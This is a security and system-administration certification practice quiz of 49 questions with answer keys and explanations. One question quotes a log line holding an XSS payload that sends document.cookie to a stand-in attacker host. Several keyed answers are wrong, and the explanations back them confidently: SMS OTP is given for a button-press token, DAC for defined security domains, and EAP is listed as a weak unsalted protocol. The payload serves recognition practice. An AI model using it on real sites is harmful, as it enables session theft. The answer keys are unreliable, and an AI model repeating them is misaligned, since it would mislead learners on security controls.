Can You Pass This System Administrator And Server Test?

Reviewed by Editorial Team

The ProProfs editorial team is comprised of experienced subject matter experts. They've collectively created over 10,000 quizzes and lessons, serving over 100 million users. Our team includes in-house content moderators and subject matter experts, as well as a global network of rigorously trained contributors. All adhere to our comprehensive editorial guidelines, ensuring the delivery of high-quality content.

Learn about Our Editorial Process

| By Catherine Halcomb

Catherine Halcomb

Community Contributor

Quizzes Created: 1439 | Total Attempts: 6,571,922

| Attempts: 7,613

Questions

Feedback

During the Quiz End of Quiz

Difficulty

Sequential Easy First Hard First

1/49 Questions

Ann a new systems administrator, is enabling auditing of server file access successes and failures. She has configured the system policy to enable auditing for file access. However, when she reviews the event logs, she does not see any updates to the log files. Which of the following should be done to ensure capture of audit logs?
- Restart the audit service to enable the logs to be collected
- Enable the objects properties for auditing
- Set write permissions on the folders to be audited
- Configure an audit security group and assign the group to the share files

About This Quiz

A system administrator is a person who manages the IT system and responsible for optimizing the IT services, Networking Servers and support systems. In large Organizations, a system administrator administers the online data or cloud computing services to secure the network and prevent from the security breach or hacking. This quiz has been developed to test your knowledge about system See moreadministration and servers. So, let's try out the quiz. All the best!

Can You Pass This System Administrator And Server Test? - Quiz

Quiz Preview

2.

A company is concerned about potential attacks on its primary ERP system and wants to set up a secondary ERP system to mirror the first. The secondary system should function as a fully operational ERP and include additional monitoring capabilities to detect and alert against attacks. Which of the following should the company deploy?
- Honeypot
- Bastion host
- IDS
- Sandbox
Correct Answer

A. IDS

Explanation

For a company looking to enhance the security of its primary ERP system by setting up a secondary system that mirrors the primary but includes enhanced monitoring features, an IDS (Intrusion Detection System) is the ideal solution. An IDS is designed to continuously monitor network and system activities, detecting and reporting potential security threats or policy violations. This setup ensures that the secondary ERP not only serves as a functional backup but also plays a crucial role in the company's cybersecurity framework by actively detecting unusual activities and potential breaches, thereby providing a robust defense mechanism against sophisticated cyber attacks. This strategic implementation enhances the overall security posture without disrupting the operational integrity of the ERP systems.

Rate this question:

4
3.

A company employs a firewall to protect its internal network. An internal router resides directly behind the firewall and is used to segment traffic to different subnets. Which of the following terms MOST accurately describes the use of multiple devices in layers to protect a network?
- Zoning
- Defense-in-depth
- Logical segmentation
- Network hardening
Correct Answer

A. Defense-in-depth

Explanation

Defense-in-depth is the most accurate term to describe the use of multiple devices in layers to protect a network. This approach involves implementing multiple layers of security controls, such as firewalls, routers, intrusion detection systems, and encryption, to provide a comprehensive defense against various types of threats. By using multiple layers, even if one layer is compromised, the other layers can still provide protection, making it harder for attackers to penetrate the network. This strategy helps to minimize the risk of unauthorized access and protect sensitive information.

Rate this question:

1
4.

A security administrator wants to implement a solution to encrypt communications between the company’s servers and client workstations. The solution must account for protocols at layers 4 through 7 of the OSI model. Which of the following should be implemented?
- ISCSI
- SSH
- IPSec
- SCP
Correct Answer

A. IPSec

Explanation

IPSec should be implemented to encrypt communications between the company's servers and client workstations at layers 4 through 7 of the OSI model. IPSec provides security services such as authentication, integrity, and confidentiality for IP packets. It operates at the network layer (layer 3) and can be used to secure communications at higher layers as well. It can be used to encrypt and authenticate data at layers 4 through 7, ensuring secure communication between servers and workstations.

Rate this question:

2
5.

A company is installing a wireless network. The company anticipates that with future growth, it will require employees to use digital certificates. Additionally, the company excepts to integrate Kerberos authentication within the next few years. Which of the following protocols BEST meets these requirements?
- CHAP
- EAP
- PAP
- MS-CHAP
Correct Answer

A. EAP

Explanation

EAP (Extensible Authentication Protocol) is the best protocol that meets the company's requirements. EAP supports the use of digital certificates for authentication, which aligns with the company's future growth plan. Additionally, EAP is designed to be flexible and extensible, allowing for the integration of various authentication methods, including Kerberos authentication in the future. This makes EAP the most suitable choice for the company's wireless network installation.

Rate this question:

1
6.

The Chief Information Security Officer receives notification that a high-ranking employee is stealing corporate secrets for a competing organization. This employee is now considered
- A risk
- An exploit
- A threat
- A vulnerability
Correct Answer

A. A threat

Explanation

In this scenario, the high-ranking employee who is stealing corporate secrets for a competing organization is considered a threat. A threat refers to any individual or entity that has the potential to exploit vulnerabilities and cause harm to an organization's assets, including its sensitive information. In this case, the employee's actions pose a significant risk to the organization's security and can potentially lead to severe consequences if not addressed promptly.

Rate this question:

3
7.
1. A public-facing web server is added to an existing network. This server must be isolated from the production network. The BEST way to add this server to the existing network design is to place the server
- In the same subnet as the other servers
- In the production VLAN
- In a DMZ
- In a separate VLAN
Correct Answer

A. In a separate VLAN

Explanation

Placing the public-facing web server in a separate VLAN is the best way to add it to the existing network design. This ensures that the server is isolated from the production network, providing an added layer of security. By placing it in a separate VLAN, the server can have its own network segment with its own set of security policies and access controls, reducing the risk of unauthorized access or attacks on the production network.

Rate this question:

1
8.

An accounting firm wants to increase the availability of its email services. Management has requested that the email servers be upgraded to ensure performance In the event of disk failures. The servers should be able to recover quickly from single disk failure with little to no downtime. Which of the following options would BEST meet these requirements?( Select TWO)
- Use RAID 0 Arrays on the servers
- Use RAID 5 arrays on the servers
- Use RAID 10 arrays on the servers
- Use network-based backup tools to perform weekly full backups
- Use tape backups and restore to a warm site during a failover
- User clustered replication of the email database for failover
Correct Answer(s)

A. Use RAID 5 arrays on the servers
A. Use RAID 10 arrays on the servers

Explanation

Use RAID 5 arrays on the servers - RAID 5 offers a good balance of performance, storage efficiency, and fault tolerance. It stripes data across multiple disks and includes parity information that allows the system to reconstruct the data should a single disk fail. This setup allows the system to continue operating even when one disk is down, and it can recover without data loss, thus providing the resilience the firm needs with minimal downtime.
Use RAID 10 arrays on the servers - RAID 10 (or RAID 1+0) combines mirroring and striping, offering high fault tolerance and improved performance over RAID 5. It requires a minimum of four disks but provides excellent read and write speed and can survive multiple disk failures as long as no two failed disks are from the same mirrored pair. This option is particularly suitable for environments where both performance and data integrity are critical.

Rate this question:

0
9.

An administrator places a server in “Permissive” mode to monitor security events before increasing system security. Which of the following tools is the administrator using?
- SELinux
- Containers
- Iptables
- Trusted Solaris
Correct Answer

A. SELinux

Explanation

The administrator is using SELinux. SELinux is a security enhancement for Linux that provides a mechanism for supporting access control security policies. When SELinux is placed in "Permissive" mode, it allows all actions to occur but generates audit logs of any policy violations. This allows the administrator to monitor security events and identify any potential security issues before implementing stricter security measures.

Rate this question:

1
10.

With MDM, which of the following is the BEST policy to implement in case of device theft?
- Choose devices without removable storage to prevent easy removal of data
- Ensure company devices are encrypted to prevent data seizure if an image is taken
- Disable certain features on the phone to prevent misuse of company device
- Have a remote wiping policy so if the device is stolen, the data is unrecoverable
Correct Answer

A. Have a remote wiping policy so if the device is stolen, the data is unrecoverable

Explanation

The best policy to implement in case of device theft is to have a remote wiping policy so that if the device is stolen, the data is unrecoverable. This ensures that sensitive company information does not fall into the wrong hands and prevents unauthorized access to data. Remote wiping allows the company to erase all data on the stolen device remotely, safeguarding confidential information and protecting the company's interests.

Rate this question:

5
11.

A security administrator needs to improve upon the current authentication system. The improved authentication system must require a second authentication factor must provide a new six-digit number only when a button is pressed on the device. Which of the following should be implemented?
- HSM
- TPM
- SMS OTP
- HOTP
- TOTP
Correct Answer

A. SMS OTP

Explanation

An SMS OTP (One-Time Password) should be implemented to improve the current authentication system. This method involves sending a unique six-digit number to the user's mobile device via SMS. The user can only receive this number when they press a button on the device, adding an additional factor of authentication. This helps to enhance security by ensuring that the user possesses both their mobile device and the ability to press the button to receive the OTP.

Rate this question:

2
12.

A pool of corporate users consists of various global staff members who use different types of authentication services, such as Kerberos and one-time passwords. Due to the operational nature of the infrastructure, a standardized way of authenticating cannot be used, but authorization of users is still necessary. Which of the following should the company utilize to authorize the staff members?
- PAP
- CHAP
- SAML
- EAP
Correct Answer

A. SAML

Explanation

The company should utilize SAML to authorize the staff members. SAML (Security Assertion Markup Language) is an XML-based open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. It allows for the secure exchange of authentication and authorization information, regardless of the type of authentication service being used by the staff members. This makes it a suitable choice for a pool of corporate users with different types of authentication services.

Rate this question:
13.

A recent audit has revealed a long-term employee has access to shares in several different departments that are not related to the employee’s current position. Which of the following would reduce the likelihood of this issue occurring again?
- Periodic user account audits
- User assigned privileges
- Continuous alert monitoring
- Biometric user authentication
Correct Answer

A. Periodic user account audits

Explanation

Periodic user account audits would reduce the likelihood of this issue occurring again by regularly reviewing and evaluating employee access to shares in different departments. This would help identify any unauthorized access or privileges that are not related to the employee's current position. By conducting these audits on a regular basis, organizations can ensure that employees only have access to the resources necessary for their job roles, minimizing the risk of potential misuse or unauthorized access.

Rate this question:
14.

A developer needs to store sensitive employee information on a back-end database. The sensitive database records must be accessed by a public web server in the DMZ. Which of the following should be implemented to secure the sensitive information stored in the database?
- Store the sensitive records using symmetric encryption
- Implement an ACL that prevents the web server from accessing the sensitive records
- Hash the sensitive records before storing them in the database
- Store the sensitive records using irreversible encryption
Correct Answer

A. Store the sensitive records using symmetric encryption

Explanation

Storing sensitive records using symmetric encryption ensures that the data is protected while at rest in the database. Symmetric encryption involves encrypting the data with a key that is also used to decrypt it, allowing authorized applications or services (such as the public web server) to access the data securely when necessary.

Rate this question:

0
15.

Which of the following uses signatures to ONLY detect network-based attacks?
- HIPS
- NAC
- WAF
- NIDS
Correct Answer

A. NIDS

Explanation

NIDS, or Network Intrusion Detection System, uses signatures to detect network-based attacks. It analyzes network traffic in real-time and compares it against a database of known attack signatures. If a match is found, it generates an alert to notify administrators of the potential attack. Unlike other options listed, such as HIPS (Host-based Intrusion Prevention System), NAC (Network Access Control), and WAF (Web Application Firewall), NIDS specifically focuses on network-based attacks rather than attacks targeting individual hosts or applications.

Rate this question:
16.

A hospital uses legacy medical devices that are incompatible with OS upgrades. Which of the following should be used to secure these devices from unauthorized use by internal employees?
- Proxy server
- Network segmentation
- Intrusion prevention system
- Web application firewall
Correct Answer

A. Network segmentation

Explanation

Network segmentation should be used to secure these devices from unauthorized use by internal employees. Network segmentation involves dividing a network into smaller, isolated segments, which can help prevent unauthorized access to sensitive devices or systems. By separating the legacy medical devices from the rest of the network, the risk of internal employees gaining unauthorized access to these devices is reduced. This allows for better control and monitoring of access to the devices, ensuring their security and integrity.

Rate this question:

2
17.

Joe, an instructor, routinely needs to run software created by students from a graduate-level programming course. He executes these programs on his office computer, which also has access to several university resources, including the database containing student grades. Joe is concerned because several of the students’ executables are oddly large and could potentially contain malicious payloads. A security administrator is helping Joe to prevent the students code from posing a security risk while maintaining his access to all university resources. Which of the following should the security administrator do to BEST fulfill the requirements?
- Implement an application whitelist on the workstation
- Install a HIDS
- Turn on DEP, SEHOP, and ASLR on the workstation’s OS
- Air gap the professor’s workstation
- Create a VM on the workstation
- Install antivirus and anti-malware software
Correct Answer

A. Create a VM on the workstation

Explanation

Creating a virtual machine (VM) on the workstation would be the best solution in this scenario. By running the students' software in a separate VM, Joe can isolate any potentially malicious payloads and prevent them from affecting his office computer and accessing university resources. This allows him to maintain his access to all university resources while minimizing the security risk posed by the students' code.

Rate this question:
18.

A security technician is reviewing a new vendor’s practices for a project, but the vendor only supplied SLA documentation. Which of the following should the security technician request to understand the vendor’s adherence to its own policies?
- Controls data audits
- Entry log audits
- Access log audits
- Security log audits
Correct Answer

A. Controls data audits

Explanation

To understand the vendor's adherence to its own policies, the security technician should request controls data audits. Controls data audits involve reviewing and assessing the effectiveness of the controls implemented by the vendor to protect data. This will provide insights into whether the vendor is following their own policies and procedures regarding data security. Entry log audits, access log audits, and security log audits may provide some information, but they are more focused on monitoring and tracking activities rather than evaluating policy adherence.

Rate this question:

2
19.

When authenticating to a database, users are required to use ten-character passwords and change their passwords every 60 days. Which of the following should also be added to this password policy to mitigate the possibility of password compromise? (Select TWO)
- Password recovery
- Lockout period
- Increased complexity
- Limited reuse
- Account disablement
Correct Answer(s)

A. Lockout period
A. Increased complexity

Explanation

Adding a lockout period to the password policy would help mitigate the possibility of password compromise. This means that if a user enters their password incorrectly a certain number of times, their account will be temporarily locked, preventing unauthorized access. This helps protect against brute-force attacks where an attacker tries multiple passwords until they find the correct one. Additionally, increasing password complexity requirements would also enhance security. Requiring users to include a combination of uppercase and lowercase letters, numbers, and special characters makes passwords harder to guess or crack using automated tools.

Rate this question:
20.

A systems administrator has received notification that an attacker has been attempting to spear phish the organizations management team. The payload installs a specific executable, which then connects to an outside server and downloads additional instructions. By specifically blocking the executable involved in the attack with the organization’s HIPS platform, which of the following is the administrator performing?
- Whitelisting
- Patching
- Blacklisting
- Sandboxing
Correct Answer

A. Blacklisting

Explanation

The administrator is performing blacklisting by specifically blocking the executable involved in the attack with the organization's HIPS platform. Blacklisting involves creating a list of known malicious or unauthorized entities and blocking them from accessing the system or network. In this case, the administrator is blocking the specific executable used in the attack to prevent it from executing and connecting to the outside server. This helps to protect the organization's management team from spear-phishing attempts.

Rate this question:

1
21.

A company utilizes a mission-critical ERP supply chain solution. Over several years, development efforts and expansion of modules have been a priority to facilitate the increasing demand. Maintenance windows have been historically used to deploy new, updated code or a new module future set. Over time the response of the ERP system has become slow and unstable, causing a delay in services the company provides to its customers. The security administrator begins investigating the issues and reviews the change management logs to attempt to correlate what may have caused the degradation. Which of the following would BEST stabilize and increase the performance of the ERP solution?
- Implement database failover to assist in managing session states
- Migrate the ERP environment to a mirrored storage solution
- Increase the memory on the database server
- Update the software to the current patch level
Correct Answer

A. Increase the memory on the database server

Explanation

Increasing the memory on the database server would be the best option to stabilize and increase the performance of the ERP solution. The slow and unstable response of the ERP system could be due to insufficient memory, as the development efforts and expansion of modules over the years have increased the demand on the system. By increasing the memory, the database server will have more resources to handle the workload, resulting in improved performance and responsiveness.

Rate this question:

2
22.

Which of the following should include a threat probability matrix?
- Incident response plan
- Backup plan
- Disaster recovery plan
- Business impact analysis
Correct Answer

A. Business impact analysis

Explanation

A threat probability matrix should be included in a Business Impact Analysis. This is because a Business Impact Analysis assesses the potential impact of various threats on an organization's operations and identifies the critical functions and processes that need to be protected. By including a threat probability matrix in the analysis, the organization can evaluate the likelihood of different threats occurring and prioritize their response and mitigation efforts accordingly. This helps in developing effective strategies to minimize the impact of potential threats and ensure business continuity.

Rate this question:
23.

A recent security audit revealed several unauthorized devices were plugged into network jacks in unused cubicles. Which of the following could be used to help the security administrator reduce investigative overhead if this scenario occurs again?
- Rogue machine detection
- IDS
- Network firewall
- HIPS
Correct Answer

A. IDS

Explanation

An Intrusion Detection System (IDS) can help the security administrator reduce investigative overhead in the scenario of unauthorized devices being plugged into network jacks in unused cubicles. IDS monitors network traffic and identifies any suspicious or malicious activity, including the presence of rogue machines. By alerting the administrator to such incidents, IDS allows for timely investigation and mitigation, reducing the time and effort required to identify and address security breaches.

Rate this question:

2
24.

A security administrator notices the following anomaly when reviewing the web proxy logs: http://intranet/page.asp?variable=”> document. Location=’http://www.darkweb.com/?’20 document.cookie. Which of the following vulnerabilities is being exploited?
- XSRF
- SQL injection
- XSS
- Session hijacking
Correct Answer

A. XSS

Explanation

The given anomaly in the web proxy logs indicates that the input in the "variable" parameter of the URL is being manipulated. This manipulation is causing the browser to execute a malicious script, which redirects the user to a different website and retrieves the cookies from the current page. This behavior is characteristic of a Cross-Site Scripting (XSS) vulnerability, where an attacker injects malicious code into a website that is viewed by other users, potentially leading to unauthorized access or data theft.

Rate this question:

1
25.

A server administrator recently implemented file system ACLs on a web server. The webmaster now reports the following message bash: vim: permission denied. Which of the following commands will assist in resolving the problem?
- Calcs
- Ls –la
- Setfacl
- Getfacl
Correct Answer

A. Getfacl

Explanation

The correct answer is Getfacl. The webmaster is reporting a "permission denied" error when trying to use the "vim" command. This suggests that the issue may be related to the file system ACLs that were recently implemented. The "Getfacl" command is used to view the file system ACLs, so running this command will help identify if there are any incorrect or missing permissions that are causing the error.

Rate this question:
26.

A CEO tells a security technician that he is concerned about preventive, detective, and corrective controls that they need to protect sensitive non-time critical information stored in the finance department. The finance department is located on the ground floor of a publicly accessible building and shares a common network with the sales department. Which of the following would be the MOST economical and would meet the CEO’s requirements?
- Install a firewall to segregate finance form the sales network, place alarm motion detectors on the ground floor and securely back up finance data
- Install firewall to segregate finance from the sales network, place security guards in the ground floor foyer, and provision a cold site for data redundancy
- Install a HIDS on all the finance department’s PCs, place alarm motion detectors on the ground floor and provision a warm site for redundancy
- Install an IDS to detect malicious users, place security guards in the ground floor foyer and provision a hot site for data redundancy
Correct Answer

A. Install a firewall to segregate finance form the sales network, place alarm motion detectors on the ground floor and securely back up finance data

Explanation

The most economical solution that meets the CEO's requirements is to install a firewall to segregate the finance department from the sales network. This will prevent unauthorized access to sensitive information. Placing alarm motion detectors on the ground floor will provide an additional layer of physical security. Securely backing up finance data ensures that it can be recovered in case of any data loss or corruption. This solution addresses the concerns of preventive, detective, and corrective controls while being cost-effective.

Rate this question:
27.

Ann, an employee, is attempting to send a digitally signed email to Joe, a manager. After applying the proper settings to her email. Ann is unable to sign the email digitally. This is most likely happening because there is an issue with
- Ann’s public key
- Ann’s private key
- Joe’s private key
- Joe’s public key
Correct Answer

A. Ann’s private key

Explanation

In a digital signature system, Ann's private key is used to create the digital signature for her email. If Ann is unable to sign the email digitally, it suggests that there may be a problem with her private key. Possible issues could include the key being corrupted, inaccessible, or incorrectly configured. Without a functioning private key, Ann cannot generate a valid digital signature for her email.

Rate this question:

2
28.

A security specialist is trying to determine the software product and version of several HTTP and SMTP servers on the network. The specialist decides a quick banner grab should suffice. Which of the following protocols would be the MOST helpful in accomplishing this goal?
- SSH
- DNS
- Telnet
- SCP
- TFTP
Correct Answer

A. Telnet

Explanation

Telnet would be the most helpful protocol in accomplishing the goal of determining the software product and version of several HTTP and SMTP servers on the network. Telnet is a protocol used for remote access to servers, allowing users to establish a command-line interface and interact with the server. By connecting to the HTTP and SMTP servers using Telnet, the security specialist can retrieve the banner information, which often includes the software product and version details.

Rate this question:

0
29.

During an assessment, an auditor observes employees holding the door for other personnel despite the presence of a swipe reader and an organizational policy that requires all personnel to swipe into secure areas. Which of the following did the auditor observe?
- Piggybacking
- Tailgating
- Impersonation
- Shoulder surfing
Correct Answer

A. Piggybacking

Explanation

Piggybacking occurs when an unauthorized person follows an authorized person into a secure area without proper authentication, such as swiping a card. In this case, employees holding the door for others bypassed the security protocol, allowing unauthorized entry into the secure area.

Rate this question:

0
30.

Joe a technician recently updated the intrusion detection signatures for new malware however, this rule has generated an overwhelming number of IDS alerts. The investigation from these events have been deemed non-threatening. These IDS alerts are considered to be
- False positives
- False negatives
- Exploited anomaly
- Malicious logic
Correct Answer

A. False positives

Explanation

The correct answer is false positives. In this scenario, Joe updated the intrusion detection signatures for new malware, but the resulting IDS alerts are not indicating actual threats. These alerts are considered false positives because they are mistakenly identifying non-threatening events as potential security breaches.

Rate this question:

1
31.

Which of the following are the BEST ways to prevent personally owned electronic devices from being connected to a corporate network? (select Two)
- Strong authentication with a hardware component
- MAC-based network authentication
- Annual technology refresh cycle
- Installing a guest network with WPA2
- Drafting a clear BYOD policy
- Disabling SSID broadcast and using RF shielding
Correct Answer(s)

A. MAC-based network authentication
A. Installing a guest network with WPA2

Explanation

MAC-based network authentication is a method that allows only devices with specific MAC addresses to connect to the network, preventing unauthorized devices from accessing the corporate network. Installing a guest network with WPA2 provides a separate network for personally owned devices, keeping them isolated from the corporate network and reducing the risk of unauthorized access or data breaches.

Rate this question:

1
32.

While creating the requirements for an upcoming project, the data owner classifies the data as critical to the success of the project, publicly available, available 85% of the time and requiring full backups each day. Which of the following security goals is MOST important for this project?
- Confidentiality
- Integrity
- Availability
- Redundancy
Correct Answer

A. Availability

Explanation

In this scenario, the data owner has classified the data as critical to the success of the project and requiring full backups each day. This indicates that the availability of the data is crucial for the project. If the data is not available when needed, it can significantly impact the success of the project. Therefore, the most important security goal for this project is availability, ensuring that the data is accessible and usable whenever required.

Rate this question:

1
33.

A company is getting billed for excess network usage, even though its usage has not changed. The company’s wireless network has been slow. The number of hosts on the network exceeds the number of wireless devices the company owns. The company has WEP-encrypted access points cascading off a router. Which of the following would solve the issue? (select Two)
- Encrypt the wireless points using WPA2
- Disable SSID broadcast
- Use MAC filtering based on company devices
- Change the antenna placement
- Perform a site survey
Correct Answer(s)

A. Encrypt the wireless points using WPA2
A. Use MAC filtering based on company devices
34.

An organization adopted a BYOD policy that allows employees to bring their personal laptops to work and only connect to the wireless network. The human resources department has received a complaint from a supervisor about an employee who spends too much time on non-work-related activities. The human resources department decides to submit a request to the IT security department to revoke the employee’s BYOD privileges. Which of the following is the BEST mitigation technique the IT security department should use to fulfill this request?
- Add the MA addresses for the employee’s personal devices to a filter
- Add the IP addresses for the employee’s personal devices to a filter
- Revoke the Kerberos tickets assigned to the employee’s devices
- Revoke the WPA2 enterprise credentials assigned to the employee’s personal devices
Correct Answer

A. Revoke the WPA2 enterprise credentials assigned to the employee’s personal devices

Explanation

The best mitigation technique the IT security department should use to fulfill the request is to revoke the WPA2 enterprise credentials assigned to the employee's personal devices. This will effectively remove the employee's ability to connect their personal devices to the wireless network, thus preventing them from accessing non-work-related activities during work hours.

Rate this question:

2
35.

After completing an audit, the auditor releases the following finding to the security team: Finding 3A: Use of weak cryptographic authentication with no SALT. Which of the following cryptographic algorithms cause this finding? (select Two)
- EAP
- LEAP
- MS-CHAPv2
- Blowfish
- Diffie-Hellman
Correct Answer(s)

A. EAP
A. LEAP

Explanation

The auditor's finding states that weak cryptographic authentication with no SALT is being used. EAP and LEAP are both cryptographic authentication protocols that are known to have weak security. Therefore, the use of EAP and LEAP would cause this finding.

Rate this question:

1
36.

A PKI user has been compromised and the user’s certificate has been revoked. Which of the following protocols will the web application use to ensure the certificate cannot be used?
- CRL
- OCSP
- Key escrow
- CA
Correct Answer

A. OCSP

Explanation

The web application will use the Online Certificate Status Protocol (OCSP) to ensure that the compromised user's certificate cannot be used. OCSP allows the application to check the status of a certificate in real-time by querying the Certificate Authority (CA) server. If the certificate has been revoked, the CA will respond with a revocation status, preventing its use. This helps to maintain the security and integrity of the PKI system by promptly invalidating compromised certificates.

Rate this question:

1
37.

An organization’s IT manager is implementing some new controls related to the secure management and configuration of network equipment within the production architecture. One of the controls requires log files to be stored away from the network perimeter and secured against unauthorized modification. Which of the following would BEST provide the capability required to address this control?
- File integrity monitor
- SIEM
- DMZ
- Local RAID drive
Correct Answer

A. SIEM

Explanation

SIEM (Security Information and Event Management) would be the best solution to address the control of storing log files away from the network perimeter and securing them against unauthorized modification. SIEM systems collect and analyze log data from various sources, including network equipment, to identify and respond to security incidents. They can also provide centralized storage for log files, ensuring they are kept separate from the network perimeter and protected from unauthorized access or modification. Additionally, SIEM systems offer features such as log file encryption and access controls, further enhancing the security of the stored log files.

Rate this question:

3
38.

An administrator finds many employees are clicking on links in phishing emails. Which of the following should the administrator implement to protect workers who are tricked by these emails?
- URL filter
- Spam filter
- Protocol analyzer
- Web application firewall
Correct Answer

A. Spam filter

Explanation

A spam filter should be implemented to protect workers who are tricked by phishing emails. A spam filter helps to identify and block malicious emails, including phishing emails, before they reach the users' inbox. It uses various techniques such as content analysis, blacklisting, and whitelisting to filter out unwanted and potentially harmful emails. By implementing a spam filter, the administrator can reduce the likelihood of employees clicking on links in phishing emails, thereby protecting them from falling victim to phishing attacks.

Rate this question:

3
39.

Which of the following risk mitigation strategies could be implemented to ensure IT staff does not implement unapproved modifications to the company’s email system?
- Incident management
- Change management
- Data loss prevention
- Routine audits
Correct Answer

A. Change management

Explanation

Change management is a risk mitigation strategy that could be implemented to ensure IT staff does not implement unapproved modifications to the company's email system. Change management involves implementing processes and controls to manage and track any changes made to the system, ensuring that all modifications go through a formal approval process. This helps prevent unauthorized or unapproved changes from being implemented, reducing the risk of potential issues or vulnerabilities in the email system.

Rate this question:

0
40.

A consulting firm has been hired to secure a new web application against XSS. Which of the following would be the BEST control to implement?
- Input validation
- Whitelisting
- Error and exception handling
- Access control list
Correct Answer

A. Input validation

Explanation

Input validation is the best control to implement in order to secure a new web application against XSS (Cross-Site Scripting) attacks. Input validation ensures that any data entered by users is checked and validated before it is processed or stored. By validating user input, the application can identify and reject any potentially malicious scripts or code that could be used to exploit vulnerabilities and execute unauthorized actions. This helps to prevent XSS attacks by ensuring that user input is safe and does not contain any harmful code.

Rate this question:
41.

A security engineer is asked to value performance while maintaining security on the company’s streaming media site. After some industry concerns arise with the way the company has implemented its RC4 algorithm, the security administrator decides to switch away from it in favor of a stronger algorithm. Which of the following should the security administrator utilize while still favoring performance?
- Blowfish in counter mode
- RIPEMD using electronic code book
- DES using cipher feedback
- 3DES using Galois counter mode
Correct Answer

A. Blowfish in counter mode

Explanation

Blowfish in counter mode should be utilized by the security administrator while still favoring performance. Blowfish is a symmetric encryption algorithm known for its fast performance. Counter mode is a method of encryption that allows parallel processing and can enhance performance. Therefore, using Blowfish in counter mode would ensure a strong algorithm for security while maintaining good performance on the company's streaming media site.

Rate this question:

0
42.

During a disaster recovery testing procedure a typically disabled service on the application server was started. Which of the following tools would BEST indentify situations in which the service is not shut down?
- NIDS
- Baseline analyzer
- File integrity monitoring
- SIEM
Correct Answer

A. Baseline analyzer

Explanation

A baseline analyzer is the best tool to identify situations in which a typically disabled service on the application server is not shut down. A baseline analyzer compares the current state of the system to a baseline or normal state, and detects any deviations or anomalies. In this case, it can detect if the disabled service has been started during the disaster recovery testing procedure, alerting administrators to the situation. NIDS (Network Intrusion Detection System) monitors network traffic for suspicious activities, file integrity monitoring checks for unauthorized changes to files, and SIEM (Security Information and Event Management) collects and analyzes security logs. However, these tools may not specifically identify if a disabled service is started.

Rate this question:
43.

Joe, a security administrator, has started using a centralized application whitelist in his organization. Joe wishes only to allow applications within a specific folder to execute. Additionally, Joe would like to allow all applications from a specific vendor. Which of the following controls should Joe implement? (Select TWO)
- Create “deny” rules for all applications with a specific file hash
- Create “deny” rules for all applications with a specified file path
- Create “allow” rules for applications signed with a specific digital signature
- Create “allow” rules for applications with a specific file extension
- Create “allow” rules for applications within a specified file path
- Create “deny” rules for applications signed with a specific digital signature
Correct Answer(s)

A. Create “allow” rules for applications signed with a specific digital signature
A. Create “allow” rules for applications within a specified file path

Explanation

Joe should implement two controls to achieve his desired outcome. Firstly, he should create "allow" rules for applications signed with a specific digital signature. This will allow him to whitelist all applications from a specific vendor, as digital signatures are unique to each vendor. Secondly, Joe should create "allow" rules for applications within a specified file path. This will restrict the execution of applications to only those located within the specified folder, ensuring that only approved applications are allowed to run.

Rate this question:

2
44.

A development company intends to market its OS product toward high-security users. When designing the kernel’s security architecture, the development team begins to map out specific objects and determine which subjects will need to be able to access those objects. The team defines specific security domains that provide the context for this access control. Which of the following represents the access control objective the development team is trying to achieve?
- MAC
- Rule-based access control
- DAC
- Role-based access control
Correct Answer

A. DAC

Explanation

The development team is trying to achieve the access control objective of DAC (Discretionary Access Control). DAC allows the owner of an object to have control over who can access that object and what actions they can perform on it. This means that the owner can grant or revoke access permissions to other subjects based on their discretion.

Rate this question:
45.

A consulting firm has been hired to secure a new web application against XSS. Which of the following would be the BEST control to implement?
- Input validation
- Whitelisting
- Error and exception handling
- Access control list
Correct Answer

A. Input validation

Explanation

Input validation is the best control to implement in order to secure a new web application against XSS (Cross-Site Scripting) attacks. XSS attacks occur when malicious scripts are injected into web pages viewed by users, often through user input fields. By implementing input validation, the consulting firm can ensure that all user input is properly validated and sanitized before being processed by the application, thereby preventing the execution of any malicious scripts. This control helps to mitigate the risk of XSS attacks by ensuring that only safe and expected input is accepted by the application.

Rate this question:
46.

A linux server hosts home directories for members of the marketing team. File system ACL’s are in place in the home directories to allow for collaboration. Users report they are unable to view any files in a particular user’s home directory. Which of the following commands will allow the server administrator to view the file system ACLs in use on the /home/username directory?
- Getfacl /home/username
- Setfacl /home/username
- Ls –lz /home/username
- Getfacl –l /home
Correct Answer

A. Getfacl /home/username

Explanation

The correct answer is "Getfacl /home/username". The "Getfacl" command is used to retrieve the file system ACLs (Access Control Lists) in use on a directory. By running this command followed by the directory path "/home/username", the server administrator will be able to view the file system ACLs specifically for the mentioned user's home directory.

Rate this question:

0
47.

Some malware variants call back to command and control servers operated at URLs that are cryptographically generated according to the date of infection. The malware authors register the seemingly random URLs days in advance of the anticipated infections and call backs. Which of the following should a security engineer implement to prevent infections from reaching the command and control servers?
- Host-based IPS
- Signature-based IPS
- URL filtering
- Network-based content inspection
Correct Answer

A. Network-based content inspection

Explanation

Network-based content inspection should be implemented to prevent infections from reaching the command and control servers. This technology allows for the inspection and analysis of network traffic in real-time, enabling the identification and blocking of malicious communication with the command and control servers. It can detect and block the cryptographically generated URLs used by malware variants, preventing them from establishing a connection and compromising the system.

Rate this question:

1
48.

While reviewing access logs, a security administrator discovers the following output: Hostnames: zxp521, mic, Darwin: ip address: 64.213.8.1, 205.8.7.3 and 118.6.2.4: token serial s10a7f9, s10a7f9 and s10a7f9: time is 13:13, 14:01 and 14:35. Which of the following should the security administrator recommend to increase the security posture for authentication?
- Single sign-on access
- Smart card
- Access control
- Multifactor authentication
Correct Answer

A. Access control

Explanation

The security administrator should recommend access control to increase the security posture for authentication. Access control allows the administrator to define and enforce policies that determine who can access certain resources or perform certain actions. By implementing access control, the administrator can ensure that only authorized individuals are granted access to sensitive systems or data, thereby enhancing the overall security of the authentication process.

Rate this question:

1
49.

A security audit has determined the external firewall is improperly configured. Users must be able to access an RDP server and an HTTPS server remotely connected to a secured linux terminal, and access incoming emails exclusively using SSL/TLS. All other incoming traffic should be disallowed. The current incoming firewall rules are as follows: Line IP address port protocol Action 10 172.17.20.98 3389 TCP allow 20 172.17.10.50 110 TCP ALLOW 30 172.147.50.65 69 UDP ALLOW 40 172.17.30.28 23 TCP ALLOW 50 172.17.30.28 22 TCP ALLOW 60 172.17.10.51 443 TCP ALLOW 70 ANY Any ANY Deny Which of the following firewall rule changes would meet the above criteria? (Select Three)
- Remove line 10
- Remove line 30
- Change the protocol to TCP on line 30
- Remove line 40
- Change the port to 514 on line 50
- Change the port to 995 on line 20
- Change the port to 8080 on line 60
